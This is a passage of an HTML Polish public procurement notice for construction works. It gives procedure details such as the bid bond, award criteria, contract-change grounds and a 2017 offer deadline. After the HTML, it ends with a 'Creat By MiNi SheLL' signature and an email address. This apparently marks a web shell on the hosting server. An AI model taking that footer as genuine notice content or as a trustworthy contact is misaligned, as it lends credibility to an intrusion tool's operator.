     pkt 23 ustawy. Wraz ze złożeniem  oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym 
    Wykonawcą nie   prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Zamawiający żąda wniesienia od Wykonawców wadium  w wysokości 30 000,00 złotych.

1. Wadium może być wniesione w jednej z następujących form , określonych w art. 45 ust. 6 pkt 1-5
              1) pieniądzu
              2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  
                  kredytowej, z tym , że poręczenie kasy jest zawsze poręczeniem pieniężnym;
              3) gwarancjach bankowych;
              4) gwarancjach ubezpieczeniowych;
              5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 
                  ustawy z dnia 9 listopada 2000 r. o  utworzeniu Polskiej Agencji Rozwoju 
                  Przedsiębiorczości (Dz.U. 2016 poz. 359).

 2. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy  Zamawiającego w  Banku Spółdzielczym 
     w Żorach Nr  03 8456 0009 2001 0023 9732 0002.

3.  Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych  na rachunku bankowym 
      zamawiającego wskazanym w sekcji VIII pkt 2 SIWZ, przed upływem terminu składania ofert (tj. przed upływem dnia
      i godziny wyznaczonej jako ostateczny termin  składania ofert).

4.   Zamawiający zaleca, aby w przypadku wniesienia wadium w formie :

4.1   pieniężnej  dokument potwierdzający dokonanie przelewu wadium został załączony do oferty,

4.2   innej niż pieniądz  oryginał dokumentu potwierdzającego wniesienie wadium został złożony  w siedzibie Zamawiającego 
        przy ulicy Jankowickiej 49, pokój 14 (sekretariat), a jego kopia  załączona do oferty.

5.     Wadium wniesione w formie gwarancji ubezpieczeniowej lub bankowej będzie akceptowane pod warunkiem, że jest  
        zgodne z Prawem Zamówień Publicznych, a w szczególności:

       5.1    gwarancja będzie zawierała wszystkie przypadki utraty wadium przez wykonawcę  określone w art. 46 ust. 4a i ust. 5 
                Prawa Zamówień Publicznych,

       5.2   okres ważności gwarancji będzie nie krótszy niż okres związania z ofertą określony  w  specyfikacji istotnych 
               warunków zamówienia.

6.     Wadium wniesione w formie poręczenia bankowego, poręczeniach spółdzielczej kasy  oszczędnościowo  kredytowej, 
        poręczeniach udzielanych przez podmioty, o których  mowa w art. 6b  ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r.
         o utworzeniu Polskiej  Agencji Rozwoju  Przedsiębiorczości będzie akceptowane pod warunkiem, że jest  zgodne 
         z Prawem Zamówień Publicznych, a w szczególności :

       6.1  poręczenie będzie zawierało  wszystkie przypadki utraty wadium przez wykonawcę  określone w art. 46 ust. 4a i ust. 5 
              Prawa Zamówień Publicznych,

       6.2  poręczenie będzie zawierało określony datą termin odpowiedzialności, nie krótszy niż okres związania ofertą określony 
              w Specyfikacji Istotnych Warunków Zamówienia.

7.    Oferta nie zabezpieczona akceptowalną formą wadium zostanie odrzucona.  
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji</td><td>10</td></tr><tr><td>Doświadczenie personelu kluczowego (kierownik budowy)</td><td>10</td></tr><tr><td>Termin wykonania</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Z zastrzeżeniem wyjątków przewidzianych w Umowie, wszelkie zmiany Umowy wymagają dla swej ważności formy
pisemnej.
2. Zamawiający przewiduje zmiany w zawartej Umowie w stosunku do treści oferty. Istotna zmiana postanowień  Umowy                   w stosunku do treści oferty Wykonawcy możliwa jest w przypadku zaistnienia jednej z następujących okoliczności i na
warunkach określonych poniżej:

1) gdy dochowanie terminu lub warunków świadczenia usług lub robót budowlanych określonych w umowie jest  niemożliwe                z uwagi na Siłę Wyższą lub inne okoliczności niezależne od stron lub których strony przy zachowaniu należytej staranności nie były w stanie uniknąć lub przewidzieć,
2) w przypadku zmian w obowiązujących przepisach prawa, powodujących konieczność dokonania zmian w umowie,
3) w zakresie obowiązującej stawki podatku VAT, w przypadku zmian powszechnie obowiązującego prawa w tym zakresie,
4) w przypadku przerwy w robotach spowodowanej niesprzyjającymi warunkami atmosferycznymi tj. opadami deszczu o wys. 10mm/m2 trwającymi powyżej  3 kolejnych dni,
5) w innych przypadkach niezależnych od Zamawiającego lub Wykonawcy, a niepozwalających na realizację zgodnie z Opisem przedmiotu zamówienia,
- w opisanych przypadkach zmianie  ulec może odpowiednio  cena umowy brutto, termin wykonania przedmiotu zamówienia, termin płatności, sposób realizacji przedmiotu zamówienia.

6) Złożenia wniosku o upadłość albo likwidację Wykonawcy, producenta, dystrybutora lub gwaranta produktu/usługi,
7) istotnych problemów finansowych, ekonomicznych lub organizacyjnych Wykonawcy, producenta, dystrybutora lub gwaranta produktu/usługi, uzasadniających ryzyko, że jego produkty/usługi, lub elementy świadczenia mogą nie zostać należycie wykonane lub nie będą miały odpowiedniej jakości,
- w opisanych przypadkach zmianie  ulec może odpowiednio zakres rzeczowy przedmiotu zamówienia, cena umowy brutto, termin wykonania przedmiotu zamówienia, termin płatności, sposób realizacji przedmiotu zamówienia,
- w opisanych przypadkach dopuszcza się zastąpienie Wykonawcy, nowym wykonawcą (art. 144 ust. 1 pkt 4 lit. a)
     ustawy Pzp), jeżeli nowy wykonawca jest następcą prawnym Wykonawcy lub przejął zobowiązania Wykonawcy
     związane z wykonaniem przedmiotu umowy, lub odpowiada osobiście lub majątkowo za wykonanie umowy.

8)  gdy wystąpi konieczność wykonania robót zamiennych lub innych robót niezbędnych do wykonania przedmiotu Umowy ze 
     względu na zasady wiedzy technicznej, oraz udzielenia zamówień dodatkowych, które wstrzymują lub opóźniają realizację  
     przedmiotu Umowy, wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne 
     podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji,
9)  jeżeli wystąpi brak możliwości wykonywania robót z powodu  nie dopuszczania do ich wykonywania przez uprawniony organ 
     lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy,
10) jeżeli wystąpią zdarzenia losowe (w szczególności: klęska żywiołowa, znaleziska niewybuchów oraz 
     archeologiczne),
    -  w opisanych przypadkach zmianie  może ulec termin zakończenia robót.

<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 11/04/2017, godzina: 08:45,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com